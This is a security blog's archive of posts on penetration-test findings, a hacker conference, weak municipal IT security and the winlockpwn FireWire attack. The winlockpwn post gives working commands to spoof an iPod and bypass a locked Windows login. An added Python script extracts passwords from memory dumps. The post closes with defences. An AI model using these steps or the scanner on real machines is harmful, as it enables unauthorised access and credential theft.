Tag Archives: Hacking

Top 5 Attack Vectors Report: Defend It Before You Hack It

Filed under Defense

Each year my team conducts hundreds of penetration tests in a wide variety of industries, ranging from healthcare to retail and finance to manufacturing. The team analyzed the data collected from each of our penetration tests at SecureState since 2011 and found common themes in the methods of compromise used to break into organizations and expose sensitive information. As a result, SecureState has issued a new report that expands on the attack vectors identified and suggests ways organizations can defend against them. SecureState’s 2014 Attack Vectors Report revealed the following top 5 methods of compromise:

  1. Weak Passwords
  2. Web Management Consoles
  3. Missing Patches and System Misconfigurations
  4. Application Vulnerabilities
  5. Social Engineering

The full report is available for download on the SecureState website. I also presented a webinar (watch the replay here) with Defense team lead Robert Miller, expanding on the report’s findings and offering additional advice to organizations on how to defend against these attack vectors. I highly recommend you download this report to see where your organization stands with regard to these attack vectors.

What’s the bottom line?
The current mindset of many organizations is to react only after an attack or breach has already occurred. However, based on our findings and on what the current onslaught of breaches has shown us, it’s clear that organizations face the same attacks month after month. Rather than being reactive, the defensive mindset needs to become proactive. Focus time, money and resources on your defensive controls before a penetration test occurs.

A penetration test should be your final step: it confirms that your defenses can withstand an attack and shows where they need adjusting. We’ve seen it time and time again: organizations conduct an annual penetration test and expect that remediating the tactical findings will improve their security posture. This needs to stop! Build and test your defensive controls first, then test to see how those controls hold up. The fixes that fall out of a penetration test are a mix of tactical and strategic, but they are reactive by nature. By taking a proactive stance on defense, your organization will become much more secure, and the time, money and resources spent will deliver far more value to the business.

Defend it before you hack it.

Cross-posted from the SecureState Blog


Notacon 7 – Things to Do and Talks to Attend

Filed under Cleveland, Hacking

The con that is Notacon is upon us. Notacon is one of the best cons I have ever attended! It’s a great mix of hacking, security, art, technology and everything in between. It’s also small enough to network with others…oh, and it’s in Cleveland, which means it’s affordable! Things get started tonight with a free preview beginning at 7pm! Some of the speakers will be giving previews of their talks, so go check it out if you can.

Just like previous years, there are some really cool events you need to attend, including Whose Slide is it Anyway, the Friday night experience and Blockparty! This year the lock picking village is sponsored by Cleveland Locksport, and be sure to check out Deviant Ollam’s new challenge, the Defiant Box. Security Justice will also have a live show at 11pm Friday night in the Notacon Radio room. As for talks, this year’s lineup looks great! Here are my picks of talks to attend this year:

Mick Douglas (from PaulDotCom Security Weekly) – U R Doin it Wrong Info Disclosure over P2P Networks
Tiffany Rad – Hacking Your Car: Reverse Engineering Protocols, Legalities and the Right to Repair Act
Brad Smith – Stealing from God!
Emily Schooley – Independent Filmmaking – Bringing Your Ideas from Paper to the Screen, and Everything in Between
Nicolle “rogueclown” Neulist – Hey, Don’t Call That Guy A Noob: Toward a More Welcoming Hacker Community
int eighty – Malicious PDF Analysis
catfood – Why Your Software Project Sucks (and how to make it not suck)
Dead Addict – Hidden Trust relationships, an exploration
Jeff “ghostnomad” Kirsch – The Haiku of Security: Complexity through Simplicity
David Kennedy (rel1k) – The Social-Engineering Toolkit (SET) – Putting cool back into SE

Adrian Crenshaw (IronGeek) – Anti-forensics
James Arlen, Chris Clymer, Mick Douglas, and Brandon Knight – Social Engineering Security Into Your Business
James Arlen, Leigh Honeywell, Tiffany Rad and Jillian Loslo – Hacking The Future: Weaponizing the Next Generation
Melissa Barron – Hacking 73H 0r3g0n 7r41L for the Apple ][
Tom Eston, Chris Clymer, Matthew Neely, The Confused Greenies – Surviving the Zombie Apocalypse (did you see our preview?)
James Arlen – SCADA and ICS for Security Experts: How to avoid cyberdouchery
Eleanor Saitta – Designing the Future of Sex

Also on Saturday night, don’t miss Dual Core at 8pm! I’ll be around at the con hanging out, so if you see me stop and say hi. See you there!


Who’s managing information security in your city?

Filed under Network Security

There was something shocking in my local suburban newspaper today. I opened up to page two and behold…an article that touched on information security! Specifically, the article was about how a small municipal court system in my area had a PC that was infected by an email “virus”. This virus caused a “hard drive to shut down”. “Shut down”, I would assume, means the MBR was corrupted or the PC was so bogged down with malware that it had to be rebuilt. Don’t worry, it gets better. The reporter goes on to say that an employee opened an email that had something to do with Nigeria and winning money. Hmmm…Sinowal Trojan perhaps? Regardless, the reporter goes into details from the interview he did with the city “IT manager”. Here are some quotes from the article:

“The court computer system has a small firewall, he said, but the anti-virus on the computer was either non-existent or never upgraded.”

“The IT manager has been trying to bring the city computer systems up to speed. There hasn’t been a system-wide upgrade in years.”

“The employee opened the email because there’s no formal training.”

“One of his goals is to work out a way he can send out software updates, especially anti-virus, to all city computers at night when they aren’t in use.”

I like this one the best…

“The main issue is spending the money for software, licenses and equipment. It’s pretty down-to-earth-basic, he said. “You’ve got to start throwing money around to get it to work.”

Huh? Throw money at the problem…classic. Multiple levels of FAIL right? Oh, if you haven’t figured it out yet…read those quotes again. What would a hacker think about after reading this newspaper article? This court/city computer system is a target rich environment to say the least!

While we could talk all day about how the city could implement a better, more cost-effective solution to these issues, there are two main problems that I see:

Be careful what you say to the media after an incident
The IT manager gave out way too much information to the media about the problems the city is facing with IT security. Just by reading this article, someone with bad intentions and a bit of technical skill now knows that the city employs people with no security awareness training and that the network probably hasn’t been patched in years. This would be even scarier if police and fire computer systems were on the same network! The article did point out that police and fire systems are on a separate network. Yet things don’t look good for the police and fire networks if this same IT manager is running those as well! :-/ Local city government should carefully review all media requests for information about an incident.

Local cities, municipal court systems, fire and police networks are left for dead
This doesn’t surprise me, but just like a lot of small businesses, small city governments or suburbs don’t spend the money or have the staff to keep systems patched or up-to-date. Especially in a recession! Your IT guy or contracted support is an easy thing for a city to cut. I would think that most city networks are in worse shape than some home PC networks because of outdated equipment, outdated knowledge and lack of funds. Case in point, I wrote about a potentially dangerous vulnerability that was found on another local city network last year. Luckily this city took the vulnerability seriously, resolved the issue and hopefully improved their security.

Imagine the problems that could happen if police, fire and court systems were breached or compromised. Critical infrastructure like police and fire networks is at serious risk when it runs on unsecured systems that are not maintained. As a citizen who lives and works in these cities, you should question your local city government about how they maintain and manage their networks. I have an email en route to the mayor of this city that will hopefully give them some ideas and suggestions to get back on track. However, I think we may only be scratching the surface of the problem. Let’s hope your city takes computer and network security more seriously.


Winlockpwn: More than a Party Trick

Filed under Hacking

Fun with FireWire

I have seen a couple of blog posts, articles and even the creator of winlockpwn (the hack/script that allows you to bypass Windows authentication through FireWire) saying that this script is nothing more than a “partytrick”…

“Wow and amaze your friends by magically unlocking a Windows PC without a password!”

While this seems like a fun thing to do at your next party to impress the ladies (ladies that like geeks and slick python scripting of course!)…the truth is that it’s a pretty serious issue. I have to hand it to the creator of winlockpwn (Adam Boileau aka: Metlstorm) for having such a cool sense of humor about the whole thing and all the media attention he has gotten (he got “slashdotted” when he released the script). On his web site he mentions that “it’s a pity to write code and have no one use it”. Adam, we totally agree!

The No Tech Hacking Phenomenon
Attackers will always take the easiest route to the network, confidential information, trade secrets or whatever else they are after. As more companies and organizations lock down their networks, it’s becoming more and more popular to use social engineering to bypass physical security controls and get onto the network that way. This is the “No Tech Hacking” phenomenon recently popularized by Johnny Long in his book of the same name (Johnny also gives a great talk on the topic). No tech hacking covers things like social engineering, dumpster diving, shoulder surfing, tailgating and people watching; I won’t go into a ton of detail about this, read his book if you want to know more. The FireWire authentication bypass adds one more tool to the mix: once you have physical access to a location and a computer, it is almost always game over. Sure, there are other attacks you could do, like boot a CD to change the admin password (assuming the machine isn’t using pre-boot authentication with hard drive encryption) or try to exploit another vulnerability, but the FireWire attack needs no reboot and leaves the running session intact, so combined with “no tech” hacking techniques it just got easier for an organization to get pwned.

Demos and information about winlockpwn
I decided to try winlockpwn out on my own to see how easy it really is. There are a ton of articles out there already, but few give you all the details about where this hack originated and why this isn’t a Microsoft-specific issue. There are even videos up on YouTube demonstrating this. I was going to do the same type of demo but felt that screen shots would be just fine. To add to the twisted irony of all this, I did record a video demo but couldn’t find my 4-pin to 6-pin FireWire cable to hook up to my Mac to edit the video! Had a 6-pin to 6-pin of course…silly cables. Anyway, let’s get right to it and talk about the background of the winlockpwn script and how all of this came about.

Where did winlockpwn come from?
Back in 2006 at the RUXCON conference, security researcher Adam Boileau gave a talk called “Hit By A Bus: Physical Access Attacks With FireWire” about a “feature” of FireWire: with the right access to memory it would bypass Windows authentication. However, the code wasn’t released, and according to Adam this was because “Microsoft was a little cagey about exactly whether FireWire memory access was a real security issue or not and we didn’t want to cause any real trouble”. That’s funny…Microsoft being “cagey” about something? More recently, after a team of Princeton University researchers released a video and paper detailing the “Cold Boot Attack”, Adam felt that it was time to release his script (with a little coaxing from the Risky Business podcast folks).

Not a Microsoft Issue!
The inherent issue is in the IEEE 1394 design itself, as implemented by the OHCI 1394 host-controller specification: a device on the bus can issue read and write requests against the host’s physical memory, and the host controller services them by DMA without involving the CPU. That is deliberate, and it is one of the reasons FireWire is as fast as it is with so little CPU overhead, so it is not a Microsoft bug. What the operating system does control is which bus nodes the controller will answer, and Windows of this era switches that access on for nodes that present themselves as SBP-2 storage devices (an iPod is one), which is exactly why the attack below makes the attacker’s adapter look like an iPod.

How does the attack work?
In its simplest form, the authentication bypass attack involves two PCs. The target must be running Windows 2000, XP or Vista, have a FireWire port (built in or via a removable PCMCIA FireWire card) and be “locked”. The attacking machine must be running a Linux/Unix variant loaded with the pythonraw1394 library bindings, the romtool utility (which essentially makes your FireWire card look like an Apple iPod) and the winlockpwn.py script. The iPod disguise is what earns the attacker physical memory access: Windows only grants it to nodes that claim to be an SBP-2 storage device. What makes this attack easy is that the Helix (v1.9) forensics LiveCD already has the pythonraw1394 bindings and romtool installed, so all you need is to download winlockpwn.py and run romtool to make the attacker’s FireWire port emulate an Apple iPod. To the target machine it looks like a FireWire Apple iPod is being connected, and that is what shows up in Windows Device Manager. Let the fun begin!

I want to note that not only can you use winlockpwn to unlock a PC, you can also use a tool called 1394memimage to dump the physical memory of the victim PC to a USB drive. This could be even more valuable, since you can then run “strings” over the image and search for anything interesting (passwords, login information, etc.). Do run it for UTF-16 text as well as plain 8-bit text, since Windows stores much of what you are after as UTF-16. I won’t go into the details about 1394memimage (and I have yet to try this), but you basically follow the same steps described below and, where you would run winlockpwn, run 1394memimage instead. Here is a good, detailed article about this process.
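Added example (not from the original post and not one of Boileau’s tools): a small Python scanner for a dump like the one 1394memimage writes. Plain “strings” only finds 8-bit text unless told otherwise, and Windows keeps most user names and passwords in memory as UTF-16LE, so the script extracts both encodings, sorts them by offset, and reports any string containing a credential keyword together with whatever sits within a few dozen bytes after it, since the interesting value is usually the neighbour of the label rather than the label itself. The memory image is constructed inline so the script runs offline; the keyword list and window size are my own choices, not anything from the post.

```python
"""Credential-hunting string scanner for a raw physical-memory image.

Added example, not part of the original post or of Boileau's winlockpwn /
1394memimage package. Extracts printable ASCII and UTF-16LE runs, then
reports strings that contain a credential keyword plus strings that follow
such a keyword closely in memory.
"""
import re
from typing import Iterator, List, Tuple

MIN_LEN = 6                      # minimum characters for a run to count as a string
WINDOW = 64                      # bytes after a keyword hit in which neighbours are reported
KEYWORDS = ("password", "passwd", "pwd", "username", "logon", "credential")

# 8-bit printable run, like `strings`
ASCII_RE = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
# UTF-16LE run: printable ASCII byte followed by a NUL, repeated (like `strings -e l`)
UTF16_RE = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN)


def extract_strings(image: bytes) -> Iterator[Tuple[int, str, str]]:
    """Yield (offset, encoding, text) for every ASCII or UTF-16LE run in the image."""
    for m in ASCII_RE.finditer(image):
        yield m.start(), "ascii", m.group().decode("ascii")
    for m in UTF16_RE.finditer(image):
        yield m.start(), "utf-16le", m.group().decode("utf-16le")


def find_credentials(image: bytes, keywords=KEYWORDS, window: int = WINDOW) -> List[Tuple[int, str, str]]:
    """Return strings containing a keyword, plus strings starting within `window`
    bytes after the end of the most recent keyword string.

    A hit on "Password:" alone is just a label; the value is usually the next
    string in memory, which the window catches.
    """
    hits: List[Tuple[int, str, str]] = []
    last_keyword_end = -1
    for off, enc, text in sorted(extract_strings(image), key=lambda t: t[0]):
        low = text.lower()
        if any(k in low for k in keywords):
            hits.append((off, enc, text))
            last_keyword_end = off + len(text.encode(enc))   # byte length in the image
        elif last_keyword_end >= 0 and off - last_keyword_end <= window:
            hits.append((off, enc, text))
    return hits


def build_sample_image() -> bytes:
    """Constructed sample image (not a real dump): non-text filler with a few
    planted strings in both encodings. Filler deliberately avoids 0x20-0x7e so it
    never forms a printable run."""
    filler = bytes(range(0x00, 0x20)) + bytes(range(0x7f, 0x100))   # 161 bytes
    parts = [
        filler,
        b"MSV1_0 logon cache\x00",                       # ASCII, keyword "logon"
        b"\x00" * 16,
        "Username: jdoe".encode("utf-16le"), b"\x00\x00",
        "Password:".encode("utf-16le"), b"\x00\x00",     # label only ...
        "Summer2008!".encode("utf-16le"),                # ... value follows 2 bytes later
        filler,
        b"kernel32.dll\x00",                             # far from any keyword: ignored
        filler,
        b"ftp://backup01/ pwd=r3st0re\x00",              # ASCII, keyword "pwd"
    ]
    return b"".join(parts)


if __name__ == "__main__":
    for off, enc, text in find_credentials(build_sample_image()):
        print("0x%08x %-8s %s" % (off, enc, text))
```

The window heuristic is crude on purpose: on a real 512 MB image it will surface plenty of noise, but it is far more useful than grepping for the word “password” and reading only the labels.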

Steps to demo the attack
It might be a good idea to demo this to your management and/or clients so I put together a little demo. Below is my lab setup:

– Desktop with a PCI FireWire Card running fully patched Windows XP SP2 (the victim)
– Laptop with a PCMCIA FireWire card (generic FireWire card, you can find a ton of these on eBay) booted with the Helix LiveCD (v1.9)
– 6-pin to 6-pin FireWire Cable
– USB Thumb Drive w/winlockpwn.py script

1. Boot the laptop from the Helix LiveCD. Next, “lock” the victim desktop. Copy the winlockpwn.py script into the pythonraw1394 directory on the laptop:

cp winlockpwn.py /usr/local/pythonraw1394


2. Connect the 6-pin to 6-pin FireWire cable to both PCs.

3. Load the raw1394 kernel module, then run ./businfo (from the pythonraw1394 directory) to confirm the adapter is visible; it should show up as port 0.

modprobe raw1394

(Screenshot in the original post: businfo output after loading raw1394.)

4. Reprogram the adapter’s configuration ROM (CSR) so it mimics an Apple iPod, then run ./businfo again to confirm the FireWire card now presents itself as an iPod:

./romtool s 0 ipod.csr


(Screenshot in the original post: businfo output showing the iPod emulation.)

5. Wait a few seconds for the FireWire/iPod drivers to load on the victim desktop, then run winlockpwn.py. Run winlockpwn with no parameters to see all the options; there are several (one will actually spawn a command shell right at the login screen!). For this demo we are just using option 2 (regular, non-fast-user-switching). The arguments are the port (0), the target node (1) and the option (2):

./winlockpwn.py 0 1 2

(Screenshot in the original post: winlockpwn output on success.)

6. Press CTRL-ALT-DEL on the victim desktop. You will get an error message box about an incorrect password. Ignore it and press ENTER. You will then be logged into the Windows desktop, bypassing authentication! Note that you can now lock and unlock the computer as many times as you want, because the script has patched the password check inside the running copy of msv1_0.dll and that patch survives until the next reboot. Also, if you want to run the demo again, uninstall the FireWire drivers that were loaded in Windows Device Manager before rebooting the box; otherwise you will probably have problems getting the hack to work again.

How to protect yourself from winlockpwn?
Well for starters, don’t lose physical control of your PC! That sounds obvious, but it goes back to the fact that once an attacker has physical access to your PC it’s pretty much over regardless. Here are some tips that I and others are suggesting. Keep in mind that most of these can be circumvented; a “defense in depth” strategy is always the best way to go:

– Ensure that all sensitive laptops/desktops are using whole disk encryption software with a pre-boot password (and remember that it protects data at rest only; a machine that is merely locked still has its keys and everything else sitting in RAM).
– Disable standby and also hibernate.
– Disable unused ports in the BIOS, including bootable USB devices.
– Disable the 1394 host controller in Windows Device Manager on machines that don’t need FireWire; the attack only works while the OS has the controller up and answering bus requests. Disabling the SBP-2 driver (service name sbp2port) is a narrower alternative that keeps FireWire usable but denies the emulated “iPod” its memory access.
– Disable the PCMCIA slots in the Windows device manager (this may cause more problems than it’s worth). This matters even on a machine with no built-in FireWire port: Windows will happily install the controller driver for a CardBus FireWire adapter pushed into a locked laptop.
– Don’t purchase laptops/desktops with FireWire ports (do you really need FireWire when you have USB ports?).
– Always secure laptops physically with a cable lock when unattended (depending on your environment).
– Mandate that users shut down their PCs if they are going to leave a PC unattended for a long period of time.

If you have any more suggestions let us know in the comments.
